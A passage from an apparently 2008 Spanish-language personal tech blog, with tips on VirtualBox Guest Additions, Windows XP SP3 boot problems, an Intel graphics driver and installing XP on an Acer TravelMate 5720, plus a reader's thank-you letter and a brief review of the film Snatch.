Seleccionaremos la opción "Instalar GuestAdditions (Aplicaciones del anfitrión)..." y nos aparecerá un asistente de instalación al estilo Windows ("siguiente – siguiente – siguiente"). Si seguímos las instrucciones del asistente se nos instalarán los VboxGuestAdditions. Finalmente sólo nos quedará reiniciar la máquina virtual.

Si se te presenta algún error, has lo siguiente:

sudo chmod 666 /dev/vboxdrv

sudo aptitude install linux-headers-$(uname -r) Esta opción instalará los kernel headers correspondientes al nuevo kernel. Usaremos el modificador uname -r para no tener que estar mirando la versión de nuestro nuevo kernel.

2.) Seguidamente, ejecutaremos el siguiente comando para que se corrija el error:
sudo /etc/init.d/vboxdrv setup

vbox ya estará configurado para el nuevo Kernel funcionará sin problemas

problemas con el sp3

La instalación del esperado tercer pack de servicio para Windows XP está causando anomalías en algunos equipos, cuyos usuarios están reportando reinicios infinitos y otra serie de problemas que impiden cargar el sistema tras la actualización.

Los usuarios afectados no pueden arrancar el sistema operativo en "modo a prueba de fallos" ni revertir el sistema a un punto de restauración anterior.

Los principales problemas afectan a máquinas con procesadores AMD debido a que fabricantes como HP utilizan la misma imagen para ordenadores Intel y AMD, lo que lleva a la carga del controlador de gestión de energía "intelppm.sys", incompatible con el "amdk8.sys" destinado al mismo fin para ordenadores AMD. En estos casos el sistema despliega el mensaje de error 0×0000007e o inicia un bucle de reinicios infinito. La solución para estos casos es borrar el archivo de Intel mediante la consola de recuperación.

Otro de los problemas reportados con el código de error STOP: 0×000000A5 afecta a determinadas placas base para AMD como la ASUS A8N32-SLI. Otros de los reportes de error se relacionan con discos duros con sectores defectuosos, infectados con malware o controladores incompatibles especialmente de video.

Este tipo de errores más comunes de lo que sería deseable, aparecen con frecuencia a la hora de la instalación de los Service pack de Windows que modifican los archivos del sistema, debido principalmente a incompatibilidades con el hardware y sus controladores o como en el primer caso a un error en el diseño y distribución de las imágenes OEM. A pesar de estos problemas sigue siendo una actualización muy recomendable para usuarios de XP, por la instalación de sus más de 1.100 parches y correcciones de errores respecto al SP2 y el pequeño aumento de rendimiento reportado por los usuarios.




lunes, 12 de mayo de 2008

Muchas gracias a ti!!

Nelson:

 

Buenas tardes, quiero agradecer la ayuda que en forma indirecta me prestaste en la página de adslzone.

 

Te cuento, adquirimos 5 notebook Acer 5720, pero solicitamos que vinieran con XP, los equipos han presentado varios problemas y el principal era ese del apagado incorrecto.

 

Probé con un montón de sugerencias, pase hartas rabias y dolores de cabeza, hasta que di con tu apoyo.

 

Gracias por la ayuda desinteresada.

 

Atte

 

Hugo Quilodrán Jiménez

Depto. Informática

Dirección General de los Servicios

Armada de Chile

Driver para la tarjeta gráfica Intel G965

hola!!

siguiendo con el tema del portátil, ahora que teneis el XP instalado, os recomendaría actualizar el driver de la tarjeta de video ( X3100) al último que proporciona Intel, el 6.14.10.4935.

Es un driver de última generación, y ofrece, según Intel, una mejora en el rendimiento del 50% !!! cosa muy necesaria en nuestro modesto equipo, sobre todo en gráficos... jeje

asi que venga, animaros, que es fácil, y merece la pena.

Saludos!! en cuanto se me vayan ocurriendo más cosas, os las voy anotando por aqui.

lunes, 10 de marzo de 2008

Snatch: cerdos y diamantes

Hoy he visto una pelicula, Snatch: cerdos y diamantes. La vi porque me la aconsejaron, pues no es el tipo de cine que frecuento. Y seguirá siendo así, pues la verdad es que no me convenció mucho. Me dejó cierto sabor a otra cosa, a Tarantino quizás, una sensación extraña, como si te comieses una mazana y te quedara un regusto a melocoton, o a pera... a lo que sea menos a manzana.
Y eso es algo que no debiera de ocurrir, no? O tan pobres están de ideas?
Mi impresion es que ultimamente en el cine se guian por la idea generalizada de que lo mas importante de una pelicula es el renombre de los actores y los efectos especiales, y tal vez aun no por este orden. Es un poco triste pero es la impresion que me da. Despues de quejan de lo caras que son de producir las peliculas, pues claro, los grandes actores no son baratos, y los efectos especiales creo que tampoco.
Todo esto lleva a la inevitable pregunta: ¿ cuánto vale una buena historia? Porque sí las hay, pero no las usan, o no las encuentran, o no lo entiendo.
Alguien me ayuda a comprender?

Instalar Windows Xp en un portatil Acer TravelMate 5720

Hace un tiempo me compré este portátil, y traía preinstalado Windows Vista. Era muy bonito y colorido, funcionaba bastante bien, era sencillo de usar...vamos, que el paso de XP a Vista se hacia hasta con gusto.
Pero con el tiempo y el uso, poco a poco empezaron a surgir problemas: incompatibilidades con programas, carencia de drivers, etc, pero sobre todo, un consumo de memoria desmesurado: 1 Gb en reposo!! una barbaridad, vamos.
El equipo trae de fábrica 2 Gb de Ram, pero aún asi se me antojaba demasiado desperdicio usar 1 solo para que el Vista estuviese a sus anchas.
Y me puse manos a la obra. Me bajé los drivers para el Windows XP y probé a realizar la instalación.
Ahi empezaron a surgir los problemas, y por eso escribo esta entrada, para que nadie vuelva a pasar por eso y pierda un dia de su vida en buscarle solución ( cosa que ya hice yo y es suficiente..jeje).

  1. Cuando arrancas el sistema con el disco de windows XP, no te reconoce el disco duro. Esto se debe a que es un disco SATA, por lo que necesitarias tener el driver en un disco de 3,5" y una disquetera USB... cosa poco común, creo, en la mayoria de los hogares. Para evitar esto vamos a la BIOS, y en la opción HDD compatibility, seleccionamos IDE. Ahora ya podemos instalar sin problemas.
  2. Ahora que ya tenemos el XP instalado, resulta que al intentar apagar el equipo, se queda en la pantalla de "Apagando su equipo" pero de ahi no pasa. El problema de aqui es la camara web. La buscamos en el administrador de dispositivos, en Concentradores raiz USB, en la pestaña Propiedades de energia, desmarcamos la opcion Permitir al equipo apagar este dispositivo para ahorrar energia. Puedes mirar a ver cual de los concentradores es el que tiene instalada la camara, pero si lo haces con todos te evitas posibles problemas...
  3. La conexion wifi se corta. Esto yo lo solucione instalando el software de gestion de Intel, Intel Proset Wireless, que está bastante bien.
Por lo demás me fue todo bien, y ahora tengo a mi equipo más aliviado, con un consumo de memoria en reposo de 240 MB...

creo que merece la pena.